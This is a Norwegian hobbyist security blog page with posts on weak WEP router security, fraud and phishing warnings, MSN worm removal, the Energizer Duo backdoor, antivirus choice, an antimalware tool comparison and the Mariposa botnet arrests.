Gå til innhold

norbat

Medlemmer
 Vis profil  Se deres aktivitet

  • Innlegg

    8 388

  • Ble med

  • Besøkte siden sist

 Innholdstype 

Blogginnlegg skrevet av norbat

  1. norbat

    Crack av WEP

    Av norbat,

    Så lenge man gjør det mot sin egen ruter så trenger man ikke å få dårlig samvittighet, men må man så må man...
     
    Av en eller annen grunn trynet husets trådløse ruter (Linksys) og jeg fikk ikke noe liv i den igjen. Med 4 pc'er i hus som alle går på trådløst, ble det krisestemning blant ungdommen. Hvordan skal vi klare oss uten msn, facebook, go supermodel og diskusjon.no - helt til i morgen?
     
    En rask sjekk viste at det var et WEP-kryptert nettverk ganske nære - ja det viste seg at det var naboen som hadde ett. Vedkommende var dessverre reist bort for helga, men som gode naboer vi er og etter en rask telefon, så var det ikke noe problem å få bruke nettet hvis jeg klarte å koble meg inn på ruteren. Hvilken WEP-nøkkel som trengtes hadde naboen ingen peiling på ("WEP, hva er det?") da det ikke var han som hadde satt opp utstyret. "Det løser jeg, ha en fortsatt fin kveld."
     
    Som kjent (det burde være det) er WEP-kryptering en særdeles dårlig sikkerhet og med riktig program tok det meg 15 minutter å framskaffe wep-nøkkelen. Nå vil nok en wep-kryptert ruter stenge ut den vanlige naboen, men hvis dette er den vanlige måten å sikre sitt nettverk på, så er det betenkelig.
     
    Jeg tok med meg pc'n i bilen og kjørte litt rundt i nabolaget og min mistanke om dårlig sikkerhet ble bekreftet. Av 60 nettverk var det 10 uten noen form for kryptering (sjekket ikke om det var satt på mac-filtrering). 33 hadde wpa/wpa2 mens resten, 17, hadde WEP.
     
    Flere av de som hadde WEP-kryptering, hadde ruter fra Telenor (SSID = privat......). WEP-kryptering var en standard som Telenor satt opp ruterne sine med fordi ikke alt nettverksutstyr støttet/støtter WPA/WPA2. Mener at de nå benytter WPA/WPA2 som standardkryptering.
     
    Om du bor i et område med mye folk, så ville nok jeg ha satt WPA/WPA2-kryptering på nettverk.
  2. norbat
    De tradisjonelle kataloghaiene er på retur, men næringslivet er utsatt for nye former for bedrageri.Varslingslisten (varslingslisten.no) fra Næringslivets Sikkerhetsråd hjelper bedriftene å avsløre svindelforsøk.


     
    Fra 1. mars er varslingslisten lagt om slik at den legger mer vekt på metodene enn på aktørene i svindelmarkedet.
     
    En av de nyere metodene som beskrives på Varslingslisten er at bedriften får en oppringning av en selger, ofte fra Sverige.
     
    – De er gjerne aggressive på telefonen, ringer forskjellige personer i firmaet til de finner en som hører på dem. De forteller at firmaet må si opp et abonnement på en tjeneste straks, ellers løper den videre. De påstår gjerne at sjefen har bedt vedkommende medarbeider ordne opp i dette. Deretter sender de en faks som skal returneres. Men det er ikke en oppsigelse, men derimot en bestilling som binder firmaet i mange perioder.
     
    Den mest utbredte metoden er fakturasvindel i forskjellige former. Firmaet kan få en falsk faktura på ting som verken er bestilt eller levert eller det kan være tilbud skrevet på fakturablankett som ved en feil blir betalt.
     
    Vær på vakt!
     
    NHO.no
    Varslingslisten.no
  3. norbat
    Mange erfarer/har erfart at de sender ut linker til kontaktene sine og som fører til nedlasting av filer som viser seg å være malware. Andre sender linker til sider der man blir bedt om å skrive inn brukernavn og passord til msn-kontoen sin.
     
    Den første typen er malware i ordets rette betydning. Fila som lastes ned og som er en kjørbar fil, er ofte kamuflert som noe annet – gjerne som et bilde. Eller, man blir bedt om å hente ned en bestemt fil slik at man kan se 'multimedia-innholdet'. Slike filer har gjerne navn som flash_install m.fl.
     
    Når man kjører fila, så vil det starte en rekke hendelser som leder fram til at pc’n blir en del av et botnet. Slike botnet blir gjerne styrt fra irc, der den som står bak infeksjonen, har tilgang til din pc via de bakdører som vedkommende har opprettet.
     
    Den andre typen, som blir kalt phising eller ’lure-fra-deg-informasjon’, er i msn-sammenheng et forsøk på å få tilgang til dine kontakter slik at man kan sende ut reklame etc.
     
    Hvis man leser Terms of Use / Privacy Policy på disse sidene, så står det:
     
    We may temporarily access your MSN account to do a combination
    of the following:
    1. Send Instant Messages to your friends promoting this site.
    2. Introduce new entertaining sites to your friends via Instant Messages.
     
    Fritt oversatt:
    Vi vil i ny og ne logge inn på din MSN-konto og gjøre følgende:
    1. Send melding via IM til dine venner (les: kontakter) og reklamere for denne siden
    2. Introdusere nye underholdende sider til dine venner via IM.
     
    Ved å oppgi sitt brukernavn og passord, og klikke Login, har man godtatt dette. Er dette ulovlig? Tja, du får oppgitt hva som skjer før du gjør det. På den måten ønsker de som står bak dette å ha ryggen fri i og med at du selv har godtatt at de kan gjøre det de gjør.
    I lenken til phisingsiden, så finner man typisk setninger som
     
    “check out these awesome pics from the awesome party LOL”
     
    Hvilke bilder, hvilket party? – Dette er bare tull og er ment for å lure fra deg brukeropplysninger. Dette plasserer denne type virksomhet i ulovlig-kategorien.
     
    Å spre Malware via MSN, er en enkel og effektiv måte. Får man meldinger fra venner, så senker man ofte iaktsomheten en del og det er først når noen av kontaktene begynner å sende meldinger tilbake og spør om hva du driver på med, at det slår deg at du kanskje har fått ’virus’.
     
     
    Så, når man har fått dette på pc eller gitt fra seg brukeropplysningene, hva er veien ut av dette?
     
    Phising-aktiviteten stoppes lett ved at man bytter passord på msn-kontoen.
    Dette gjør du ved å logge deg inn på login.live.com
     
    Msn-virus kan være vanskeligere å bli kvitt. Hovedgrunnen er at disse ormene er ny, og få eller ingen antivirus-programmer er oppdatert for disse. Noen antivirusprogrammer klarer å stoppe eller gi advarsel om ’mistenkelig’ nettaktivitet slik at pc’n ikke blir mer infisert ved at kontakten med irc-serveren blir blokkert. Ved et senere tidspunkt vil antivirusprogarmmet (forhåpentligvis) få oppdatert sine definisjoner slik at man også får fjernet selve infeksjonen. Antivirus-produsentene er avhengige av at noen sender dem prøver på de infiserte filene slik at de kan få analysert dem og ut fra det lage deteksjonsfiler som kan fjerne dem fra pc’n.
     
    Har man ikke tid til å vente på at sitt antivirusprogram er oppdatert for infeksjonen, så er det en del ting man kan gjøre selv.
     
    1. Prøve noen andre programmer som kanskje klarer å fjerne de fleste infeksjonefilene.
    2. Manuell fjerning
    3. Få hjelp av noen andre, eks. via et forum
     
     
    1. Prøve noen andre programmer som kanskje klarer å fjerne de fleste infeksjonsfilene
    Å installere flere antivirusprogrammer, kan gjøre mer skade en nytte, så når man snakker om andre programmer, er det antimalware/antispyware-programmer det siktes til. Disse kommer svært sjelden i konflikt med antivirusløsningen man allerede har og de anbefalte programmene (se under), er ofte svært rask ute med oppdateringer. Begge programmene fås i gratisversjon og er antakelig de to programmene som fungerer best i dagens anti-landskap med tanke på å fjerne malware.
     
    Malwarebytes AntiMalware
     
    SuperAntiSpyware
     
    Om det fortsatt er rusk i maskineriet, så finnes det en del online-skannere fra de kjente antivirusprodusentene. Disse er på ingen måte bedre, men kan være verdt et forsøk. Ulempen med disse er at ved infeksjoner som blokkerer nettforbindelsen både i normal og sikker modus, gjør disse online-skannerne ubrukelige. Tidsbruken på noen av dem er også svært lang.
     
    2. Manuell fjerning
    Hvis man ikke vet hva man skal lete etter, så er ikke dette spesielt lett. Men, noen holdepunkter har man: Dato og aktuelle plasseringer på systemet.
     
    Mapper som er spesielt interessante er System32 og System. I tillegg kan filer opprettet direkte under C: være verdt en titt.
     
    Gjør filer og mapper synlige
    Åpne Utforsker -> Verktøy->Mappealternativer->Vis
    Sett merke framfor ”Vis skjulte filer og mapper”
    Fjern merket framfor ”Skjul beskyttede operativsystemfiler” og ”Skjul filetternavn for kjente filtyper”
     
    Åpne f.eks. mappa System32, sørg for at visningen er satt til Detaljer. Velg å sortere etter dato ved å klikke på ’Endret dato’ slik at du får nyeste dato øverst. Da får du oversikt over nylig opprettede filer.
     
    Filer med tilfeldige tegn eller kjente filnavn som i utg.pkt ikke skal ligge i System32-mappa bør gi en pekepinn på hvilke filer som antakelig hører til infeksjonen.
     
    De filene du mistenker, kan sjekkes på Virustotal eller Jotti. Disse to nettstedene sørger for at fila blir sjekket av flere antivirusprogrammer. Problemet er om denne infeksjonen er så ny at ingen av-prog. er oppdatert for dette. Google kan brukes, men om dette er en fil med et tilfeldig navn, vil søkeresultatet oftes være null treff. Dette indikerer imidlertid at denne fila er knyttet til malware.
     
    Hvis man er usikker på om man skal slette den eller ikke, så er mitt råd at man endrer filendelsen til fila eks. jghvigg.exe -> jghvigg.exe.vir. Senere kan man igjen sjekke fila på virustotal e.l for å se om det nå blir noen treff.
     
    Da noen av disse filene kjører som en prosess (som ikke alltid er synlig i prosesslista), så må en slik filendring forsøkes fra sikker modus (da sjansen for at denne prosessen kjører fra sikker modus er mindre)
     
    At en prosess kjører automatisk når pc’n starter opp, betyr gjerne at det er blitt lagt til noen registeroppføringer som gjør dette mulig. Nå skal man være forsiktig med å surre rundt i registeret da feilsletting kan føre til ubehagelige overraskelser.
     
    Man kan derfor først sjekke om det ligger noen mistenkelige oppføringer i oppstartfanen i msconfig (start->kjør, skriv: msconfig, velg arkfanen oppstart).
     
    Blar man seg nedover lista der, så kan man finne en eller flere oppføringer knyttet til infeksjonen. Ved å fjerne merket framfor oppføringen, kan man forhindre at prosessen starter opp ved neste oppstart av pc’n om man ikke har fått fjernet selve fila.
     
    3. Få hjelp av noen andre, eks. via et forum
    Har du noen bekjente som har erfaring i filbehandling og registeredit eller i verktøy som kan peke ut infeksjonen, så benytt deg av det.
     
    Et forum er også en grei plass å søke hjelp. Det finnes ofte dedikerte supportere som har stor erfaring knyttet til fjerning av malware og som kan lede deg gjennom stegene mot en malwarefri pc.
     
    Et forslag / spørsmål som ofte dukker opp er: reinstallering. Dette er en aktuell problemstilling, men sjelden nødvendig.
     
    Man bør avslutningsvis, ta en gjennomgang av sine programmer og sørge for at de er oppdatert.
     
    Surf trygt!
  4. norbat

    Bruno fra Nigeria

    Av norbat,

    Nigeriasvindel har vært kjent fra 1970-tallet (da i form av vanlig brev, telex eller telefax). Siden har det spredt seg via internett.
     
    Det nye er tydeligvis personlig oppmøte. Nylig ble fire personer lurt til å utbetale 535.000 kroner.
     
    Når noe virker for godt til å være sant, er det mest sannsynlig det.
     
    Les hele saken i Agderposten
  5. norbat
    Siden 2007 har Energizer vært uvitende distributør av en Trojan som en del av deres Energizer Duo programvare. Filen Arucer.dll, som ble antatt å være en legitim fil som brukes av USB-batteriladere, ble i stedet en trojaner med bakdørfunksjon som tillater ekstern tilgang til datamaskin.
     
    Det har alltid vært tenkt at Arucer.dll var et legitim fil som kunne sjekke status på batteriene i batteriladeren når denne var koblet til datamaskinen. Cert har oppdaget at denne filen istedet kan være en bakdør-trojaner som lytter på port 7777 for kommandoer fra en ekstern plassering.
     
    Et eksempel ble også gitt til Symantec der de utført en analyse. De bekreftet at Arucer.dll virkelig var en bakdør og og at den var i stand til å utføre kommandoer utstedt eksternt. Disse kommandoene kan utføre følgende handlinger:


     
    Last ned filer
    Kjør filer
    Send en katalogoppføring til ekstern angriper
    Send filer til ekstern angriper
    Modifisere følgende registeroppføring: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”svchost”

     
    Energizer har nå fjernet programvaren og sendt ut en pressemelding om at en "sårbarhet" er funnet.
     
    For deg som benytter denne programvaren:
    Hvis du vil fjerne denne bakdøren, avinstaller Energizer Duo programvaren og start datamaskinen på nytt. Du vil da kunne fjerne C:\Windows\system32\arucer.dll filen fra datamaskinen. Antivirusprogrammer vil også få oppdatert sine definisjoner slik at av-programmet ditt vil detektere og fjerne fila.



    Mer info: Symantec
  6. norbat

    Valg av antivirusprogram

    Av norbat,

    Med mange produkter på markedet samt lovnader om at ”vi er best…”, så er det ikke lett å velge det ’beste’ anti-programmet og som i tillegg kan holde det det lover. Det mest aktuelle spørsmålet er kanskje om det overhode finnes anti-program som kan holde pc’n fri for malware.
     
    Min påstand er nei. Fra egenerfaring og tester er det helt klart mangler ved alle de anti-programmene som finnes på markedet i dag. Forklaringen er ganske enkel – man kan ikke finne/stoppe skadelige programmer/kode som anti-programmet ikke kjenner. Dette er en delvis sannhet fordi anti-programmer til en viss grad kan kjenne igjen adferden til skadelige programmer/kode og på den måten stoppe/gi melding om at det finnes suspekte prosesser som ønsker å kjøre/kontakte nettet.
     
    At antivirusprodusenter lever gode og travle dager er det ingen tvil om da de hver dag mottar 50 000 eksempler på malware. Vi som er målet for denne malwaren blir stadig påminnet om viktigheten av å ha en god antivirusløsning enten via div. medieoppslag eller når man kjøper seg ny pc.
     
    Hvilket sikkerhetsprogram som velges varierer. Mange bruker det programmet som man får gratis via sin ISP (internettleverandøren). Telenor, CanalDigital og Get har henholdsvis Norton, F-Secure og Norman. Nettbanken du evt. bruker, kan også tilby gratis antivirus. Mange benytter også ett av de fullgode gratisalternativene som finnes, Avira, Avg el. Avast. Om man selv går til innkjøp av et sikkerhetsprogram, er ikke prisen det som bør være avgjørende. For 300 – 700 kr pr. år får man 1-3 lisenser for en sikkerhetsløsning som inneholder div. sikkerhetsprogrammer (antivirus, antispam, brannmur etc.)
     
    Så, hva bør man velge?
     
    Min påstand var at ingen anti-programmer kan beskytte deg mot all malware og derfor spiller det antakelig liten rolle hvilket anti-program du velger å benytte. Har du gratisløsninger tilgjengelige via din ISP eller nettbank, så går du for disse. Alternativt så benytter du ett av gratisprogrammene som er nevnt (Avira…). Det finnes også gratis brannmur og andre sikkerhetsprogram (eks. antimalware, antispam…) tilgjengelig og som sammen gir en, etter manges meninger, bedre sikkerhet enn disse alt-i-ett-programmene.
     
    Hvis man vil basere valget på tester, så finnes det noen av disse på nett og som vi bruker å henvise til i ny og ne.
     
    AV-Comparatives gir med jevne mellomrom ut tester av flere antivirus-programmer, både vanlig on-demand og proactive testing.
     
    Resultatene fra de siste testene sees under og skal man velge ut fra treffprosent, så ser man noen programmer som utmerker seg framfor andre.
     
    On-demand:

     
    Proactive:

     
    Det bør nevnes at bla. Avira og McAfee har mange falske positiver (gir melding om infeksjon på ikke-infiserte filer), mens BitDefender, F-Secure og Avg har få falske positiver.
     
    NSS-labs har også nylig testet en del anti-programmer opp mot hvor gode de er til å stoppe malware fra å bli lastet ned ved besøk på infiserte nettsteder samt hvor gode det samme programmet er til å stoppe prosesser når det først har blitt sluppet gjennom. Resultatet viser at Trend Micro er 'best'. Norton kompenserer den 'dårlige' preventive treffprosenten med at den tar godt for seg når malwaren forsøker å kjøre prosesser på pc'n.
     

     
    Konklusjon:
    Hvilket program som er 'best i test' vil endre seg fra test til test. Det som er sikkert er at ingen anti-program klarer å stoppe eller fjerne all malware. Derfor blir anbefalingen den samme regla som før: Hold programmene dine oppdatert (antivirus, windows, java etc...) og bruk hode ved å ikke klikke Yes og Ok på alt som måtte dukke opp av ting og tang på nett. Skulle det gå galt, så har du dette forumet til å hjelpe deg
  7. norbat
    For noen år siden ville alle varsellamper ha lyst når en slik epost kom. I dag, med et utbredt forbrukmønster knyttet til div. nettbutikker, er det ikke nødvendigvis slik at en slik melding straks får varsellampen til å lyse.
     

     
    For mitt vedkommende venter jeg faktisk på en pakke fra utlandet. Om den blir levert med UPS vet jeg ikke, - kanskje.
     
    Uansett, en rask sjekk av vedlegget som utga seg for å være et dokument, viste ved utvidet filendelseinfo, at dette var en .exe-fil.
     

     
    En sjekk på virscan.org ga også treff hos noen av-prog.
     
    Selv om det er større fare å bli infisert ved å besøke nettsider som inneholder skadelig kode, så er det fortsatt de som prøver å lure brukeren til å åpne epostvedlegg med skadelig innhold. Det er altså ingen grunn til å senke varsellampemoduset - tvert om. Kanskje er vedlegg med skadelig innhold en økende trend?
  8. norbat
    HW.no har testet Ad-Aware og Spybot og det kommer gjerne kommentarer på slik. At disse to programmene er såpass populære, må skyldes medieomtalen de får, for snakker vi om malwarefjerning, så er det ikke disse to programmene som bør benyttes - først.
     
     
    Slik skulle kanskje artikkelen ha vært:
     
    Hvorfor sammenligne to brødbokser når kjøleskapet kan friste med bedre kvalitet.
     
    Det siktes til disse to programmene, Ad-Aware og Spybot. Når man er innom temaet malware/spyware, så blir disse to programmene nesten uten unntak bestandig nevnt. Antakelig fordi de har vært lenge i markedet (som gratisprogram), og 'before 2000' (ikke 'beyond 2000'), så var disse to programmene rimelig gode, i mangel av bedre alternativer?
     
    Så, la oss se litt på dem vs. andre programmer som antakelig gjør jobben bedre og raskere. Hvilke andre program det siktes til? - Vel, heng på, så får du vite det.
     
    Hvis man går ut fra en gjennomsnitts pcbruker, en pcbruker som i all hovedsak bruker pc'n som et verktøy (surfe, lese/sende epost, officepakken, photoshop element, bestille flybillett og nettbank), og ikke som en boks til å teste ut alt som kan testes, så kan valg av sikkerhetsløsning av og til være en forvirrende affære. Forvirrende fordi det er ikke bestandig slik at sikkerhetsprogrammet gjør jobben brukervennlig nok eller godt nok.
     
    Nå, la oss se på programmene som er plukket ut til denne testen:
    Ad-Aware 2009
    Spybot Search and destroy 1.6.2
    Malwarebytes Anti-Malware
    SuperAntiSpyware
    Spyware Doctor (Starter Edition)
    Spy Sweeper 6.0
    a-squared Free 4.0
     
     
    Ad-Aware 2009 (Nedlastingfil: 33 MB)
    Et svært populært program, som så og si alltid blir nevnt når man berører temaet spyware og annen malware.
     

     
    Programmet har et fint grensesnitt. Spørsmålet er: hvorfor finnes det ikke en nordisk språkdrakt til dette svenske programmet?
    Ønsker ikke Lavasoft at bestemora mi skal benytte programmet?
    Det hjelper ikke at man kan skifte drakt-farge.
     
    La oss se programmet i arbeid.
    Man kan velge mellom Smart scan, Full scan og Profile scan. Profile scan kan konfigureres slik at man bestemmer noe selv hva man vil skanne.
     
    Smart scan
    Skanner 'kun' de mest kritiske plassene på pc'n (les: typisk plassering av malware). Kunne like godt vært kalt for rask skann, for det er tilfellet.
    Tidsbruk: 54 sek.
    Antall objekter sjekket: 21000
    Hva ble funnet: En Zlob (registeroppføring) og 13 cookies.
     
    Full scan:
    Dette er en 'in-depth' skann. Den skal skanne hele pc'n inkl. alle hdd.
    Tidsbruk: 25 min.
    Antall objekter sjekket: 56500.
    Hva ble funnet: En Zlob, 13 cookies og 8 Suspicious objects.
     
    Vurdering:
    + Rask skann ved Smart scan-valg
    + 'Sanntid-søk'
    + Pent brukergrensesnitt
     
    - Utelot en viktig malwarefil (en fil som var knyttet til en MSN-orm som var aktiv for kort tid siden.)
    - Skaper forvirring knyttet til hva man skal gjøre med Suspicious objects. Sletter man noen her, risikerer man at noen programmer ikke fungerer etterpå.
    - Alle Suspicious objects var legale filer, men det hadde ikke bestemora mi visst, så hun hadde nok ringt.
    - Pc må restartes etter installasjon
    - Mangler nordisk språk.
     
     
    Spybot Search and destroy 1.6.2 (Nedlastingsfil 15.6 MB)
    Programmet har norsk språkdrakt, noe man velger under intallasjonen.
     

     
    Har du Ad-Aware intallert fra før, vil dette programmet komme med en advarsel om at dette kan føre til at ad-aware finner infiserte filer i arkivet (backup av det spybot evt. fjerner) til spybot. Det er flere program som gjør dette, men muligens så er det vanlig å bruke en kombinasjon av Ad-Aware og Spybot slik at dette er et kjent fenomen med denne kombinasjonen?
     
    Med Spybot, ligger det et program som heter TeaTimer. Dette progammer er laget for å beskytte systemfiler. Man får valg om å installere TeaTimer under intallasjonen. Dette programmet maser en god del når det skjer 'endringer', og vil nok ikke passe alle og enhver. Hva skal man tillate og hva skal man blokkere?

     
    Man vil også få et valg om å ta backup av hele registeret i starten. Dette er ikke nødvendig, som programmet selv sier, så da gjør vi ikke det.
     
    Så kommer spørsmålet om immunisering. Denne funksjonen skal forhindre at det skjer endringer uten viten og vilje i nettleserene (inkl. hosts-fila)
     
    Programmet kan ikke kalles pent, men det har en god del funksjoner (tilgjengelig fra Avansert modus).
     
    Spybot har ett søkemodus - Søk etter problemer. Søker ut fra en predefinert liste, som i skrivende stund består av 386991 oppføringer.
     
    Tidsbruk: ca. 25 min.
    Hva ble funnet: Ikke noe!. Verken Zlob eller annet rusk. Programmet fant/varslet om en suspekt registeroppføring, men den er godkjent av meg. Regner med bestemor hadde ringt.
     
    Vurdering:
    + Norsk språk
    + Immunisering
     
    - Fant ingen infeksjonsfiler
    - 'Fryktelig' mange valg under installasjonen.
    - Falsk trygghet?
     
     
    Malwarebytes Anti-Malware (Nedlastingsfil: 2,8 MB)
    Noe pent brukergrensesnitt kan man ikke si det har. Men, det har språk på norsk! Programmet har et enkelt utseende, arkfanebasert. Har få ekstrafunksjoner, men inneholder FileAssassin som kan slette låste filer.
     

     
    Man kan velge mellom Rask skann og Full skann. MBAM har Heuristics søk også i gratisversjonen, som betyr at den detekterer suspekt plassering/oppførsel til filer.
     
     
    Rask skann:
    Tidsbruk: 3 min og 50 sek,
    Antall objekter sjekket: 62000.
    Hva ble funnet: En Zlob (registeroppføring), en browser-hijacker (registeroppføring) og en Backdoor.bot (fil, plassering, C:\ )
     
    Full skann:
    Tidsbruk: 27 min,
    Antall objekter sjekket: 94000
    Hva ble funnet: Det samme som i rask skann.
     
    Vurdering:
    + Rask Skanner
    + God deteksjon. Finner det den skal. Undertegnede bruker alltid Rask skann og resultatet forklarer hvorfor.
    + Filer som ikke lar seg slette umiddlebart, blir fjernet under restart av pc'n da programmet vil be om en slik restart ved slike filer.
    + Norsk språk.
     
    -
     
     
     
    SUPERAntiSpyware (Nedlastingsfil: 5,5 MB)
    Som MBAM, har ikke SAS noe spesielt pent brukergrensesnitt. Navnet får også noen til å myse litt. Programmet har en blanding mellom knapper og faner for å navigere i programmet.
     

     
    Det som er svært gledelig, er at programmet nå kommer i norsk språkdrakt, noe man velger under installasjonen. Det som setter en ekstra piff, er at programmet har en del reparasjoner/fixer for div. elementer som ofte kan bli korrupte ved malwareinfeksjoner (eks. winsock m.fl)
     

     
    Ved skanning, har programmet 3 valg: Rask skann, komplett skann og egendefinert skann. I egendefinert skann, har man mulighet til å velge hvilke mapper man ønsker skannet.
     
    Rask skann:
    Tidsbruk: 6 min.
    Antall objekter sjekket: 6000.
    Hva ble funnet: en Worm-SODSBOT (backdoor.bot hos MBAM) og 3 cookies
     
    Komplett skann:
    Tidsbruk: 19 min.
    Antall objekter sjekket: 20500
    Hva ble funnet: Det samme som i rask skann.
     
    Vurdering:
    + Rask skanner
    + Finner de virkelige bad boys
    + Har flere fixer for ulike element som kan bli korrupte ved infeksjoner
    + Et kompakt program med mange funksjoner
    + Norsk språk
     
    -
     
     
    Spyware Doctor (Starter Edition) (nedlastingsfil: 29 MB)
    Dette programmet kan lastes ned gratis via Google Pack. Google Pack inneholder en bunke med Google stuff (picasa, earth etc.), men man bestemmer selv hva man ønsker å installere.
     
    Spyware Doctor har norskt språk og brukergrensesnittet er pent.

     
    Man får spørsmål om å starte IntelliGuard - sanntidsbeskyttelsen. I denne versjonen gjelder denne beskyttelsen nettleser, filer og de nyeste AktiveX-truslene. I en oppgradert versjon (må betale), beskytter IntelliGuard også Nettverksinntillingene, Prosesser - bla. mot rootkit og Startup - hindrer fiendtlige programmer fra å konfigurere seg selv ved å starte opp automatisk.
     
    Programmet tilbyr også Immunisering.
     
    En nyttig default innstilling er at prog. vil spørre om å opprette et 'gjenopprettingspunkt' før fjerning av evt. malware. Dette kan være nyttig fordi det er ikke uvanlig at det kan oppstå problemer i etterkant av malware (på generell basis)
     
    Programmet tilbyr 2 typer søk: Intelli-scan og Fullt søk
     
    Intelli-scan:
    Tidsbruk: 59 sek.
    Elementer gjennomsøkt: 201000
    Hva ble funnet: Trojan.FakeAlert (registeroppf. MBAM kaller den Zlob)
     
    Fullstendig søk:
    Tidsbruk: 25 min.
    Elementer gjennomsøkt: 249000!
    Hva ble funnet: 1 trussel og 112 infeksjoner!?
    Trussel: FakeAlerten (zlob). De 112 infeksjonene var en mulig hijacking. Det viste seg at de var knyttet til hosts-fila (lagt inn av spybot for å forhindre tilgang til en god del kjente malwaresider)
     
    Vurdering:
    + Rask skanner
    + Går grundig til verks og melder om det meste av 'mistenkeligheter' (se - )
    + Sanntidsøk/beskyttelse (delvis)
    + Immunisering
    + Kan lage systemgjenopprettingspunkt før sletting av malware.
    + Fint brukergrensesnitt
    + Norsk språk
     
    - Fant ikke den 'alvorligste' trusselen, en backdoor.bot fil
    - Finner det meste av mistenkeligheter - også legale endringer. Dette kan skape usikkerhet eller at man rett og slett bare sletter og får problemer med div. programmer i etterkant.
     
     
    Spy Sweeper 6.0 (nedlastingfil: 36,1 MB)
    Dette programmet tilbyr "Get free scan" - skann, men ikke fjern malware før du betaler lisens. Det er helt greit og derfor skulle programmet egentlig ikke ha vært tatt med i denne 'testen', men fordi den ofte nevnes blant de beste, så sier vi ja takk til en 'get free scan'.
     
    Under installasjonen får man valget om å intallere Webroot Spy Sweeper eller Webroot Antivirus with Antispyare.
    Jeg er interesser i Antispywareprogrammet og velger Spy Sweeper.
     
    Under installasjonen må man registerer seg med en gyldig epost-adresse. Jeg velger spam-adressen fordi jeg orker ikke div. tilbud og annen 'nyttig' info fra dem.
     
    Viktig: Det følger med 'adware' i form av Ask toolbar and Search Assistant, så før du trykker next og yes til alt, fjern dette valget.
     
    Når pc'n starter opp igjen, kjøres en Wizard - veileder.
    Det første den gjør er å kjøre en liten skann (memoryscan)
    Når veiledningen er ferdig, er man klar til å bruke/konfigurere programmet.
     
    Brukergrensesnittet gir en blandet følelse.

     

     
    Programmet har sanntidsøk/beskyttelse og de kalles Shields (Web browers, Network, Windows system, Startup og e-mail attachments shields). Det kommer stadig melding om at Network shields har blokkert tilgang til sider som inneholder malware. WHAT?
     
    Man får tilgang til det meste via tray-iconet (høyreklikk på spysweeper-iconet nede i systemfeltet)
     
    Spy Sweeper tilbyr Quick, Full og Custom-scan. Pr.dato har Spy Sweeper 323669 definisjonsoppføringer som den scanner imot.
     
    Quick scan:
    Tidsbruk: 9 min
    Objekter sjekket: 15 000 filer/mapper, 115 000 registeroppføringer
    Hva ble funnet: Ikke noe
     
    Full scan:
    Tidsbruk: ca. 20 min
    Objekter sjekket: 45000 filer/mapper, 115 000 registeroppføringer
    Hva ble funnet: Ikke noe
     
    Vurdering:
    + Sanntidsbeskyttelsen fungerer uten 'subscribe'
     
    - Fant ingen trusler, selv om det ligger minst 1 seriøs sak på pc'n.
    - Brukergrensesnittet er rotete, masse innstillinger. Kunne godt ha hatt en 'enkel' modus.
    - Inneholder Adware i form av ASK Toolbar
    - Må oppgi epostadresse under installasjonen.
     
     
     
    a-squared Free 4.0 (nedlastingsfil: 44.4 MB)
    Programmet har et enkelt brukergrensesnitt, ryddig, men mangler nordisk språkdrakt.

     
    Ønskes sanntidsbeskyttelse etc. finnes det en betalingsversjon (A-squared Anti-Malware)
     
    Søkevalgene er Quick scan, Smart scan, Deep scan og Custom Scan.

     
    Quick scan:
    Tid: 5 min
    Antall objekter sjekket: ca 1700
    Hva ble funnet: Ikke noe suspect
     
    Smart scan:
    Tid: 30 min
    Antall objekter sjekket: 44000
    Hva ble funnet: Ikke noe suspect
     
    Full scan
    Tid: 40 min
    Antall sjekket: 61000
    Hva ble funnet: 1 Backdoor.IRCBot, 3 trojanere i c:\Found.008-mappa. Disse FOUND-mappene blir opprettet av checkdisk/scandisk når det har vært en filsystem-korrupsjoner. Har ingen innvirkning på pc'n. Det er allikevel prisverdig at programmet tar de med.
     
    Ved funn velger man om man vil sette objektet i karantene eller slette det.
     
    Vurdering:
    + God deteksjon ved full skann
    + Enkelt brukergrensesnitt
     
    - Skanningen oppleves treg
    - Full skann må benyttes da de andre skannermodusene leter på 'feil plass'.
     
     
    Oppsummering / konklusjon:
    Etter å ha tatt en titt på de nevnte programmene, så er det raskt noen som skiller seg ut. Ikke på på grunn av utseendet, men på evnen programmet har til å fjerne problemet (les: malware).
     
    Mange programmer lover en hel del, og mange programmer tilbyr funksjoner i form av skjold (Shields) og immunisering. At designet på programmet er tiltalende, kan også være en måte å fronte programmet på.
     
    Problemet eller utfordringen er uansett at programmets evne til å detektere malware er avhengig av at programmet har de riktige definisjonene. Uten disse, vil malware snike seg unna og leve gode dager på pc'n. Det kan hjelpe med såkalt heuretic skannerfunksjon (deteksjon ut fra oppførsel/plassering av filer). Utfordringen knyttet til dette er at man i mer eller mindre grad får såkalte falske positiver.
     
    Det bør også nevnes at når programmene har funnet noe, så bør man velge å sette objektet i karantene (hvis det er mulighet for det) framfor å slette objektet direkte. Dette på grunn av at alle programmer kan melde falske positiver. Ved å sette objektet i karantene, kan man, hvis det viser seg at det var en falsk positiv, gjenopprette file. Om alt fungerer som vanlig, så kan man heller tømme karantenemappa i ny og ned for å fjerne objektet helt.
     
    Uten noe mer mikk-makk, så er dette konklusjonen:
    Skal du velge ett antimalwareprogram, så går du for Malwarebytes Anti-Malware.
     
    Deretter er programmet SuperAntispyware et meget godt alternativ.
     
    Disse programmene bør vurderes da de virker solid og har evnen til å finne det meste: a-squared og Spyware Doctor.
     
    Ad-Aware, Spybot og Spy Sweeper kan vi glemme - en stund.
     
     
    Etterord:
    Denne 'testen' må tas for det den er - en kommentar til at ad-aware og spybot til stadighet blir dratt fram i media. Den 'infeksjonen' som lå på testpc'n (en Acer bærbar, 60 gb hdd, 1,8 Mhz, 1 Gb minne, XP Pro) kan på ingen måte avgjøre hvilke av de 4 programmene som er best - men, infeksjonen var reel, noen uker gammel, og seriøse anti-programmer burde minst ha oppdaget backdoor.bot-fila som lå på pc'n.
  9. norbat
    Spansk politi har anholdt tre menn som de mener står bak et stort botnett. Ifølge spansk politi anses mennene å stå bak hackerringen Mariposa, som har infisert pc-er i 130 land.


     
    Mariposa botnettet ble tatt offline i desember etter en aksjon som involverte bla. FBI og Guardia Civil i Spania. Botnettet ble brukt til å stjele sensitiv informasjon fra uvitende brukere, inkludert brukernavn, passord, innloggingsdetaljer for nettbank og kredittkortdata.
     
    Den spanske gjengen leide ut deler av botnet til andre cyber-kriminelle i bytte mot kontanter, og solgte stjålne bank-og kredittkort informasjon til tredjepart.
     
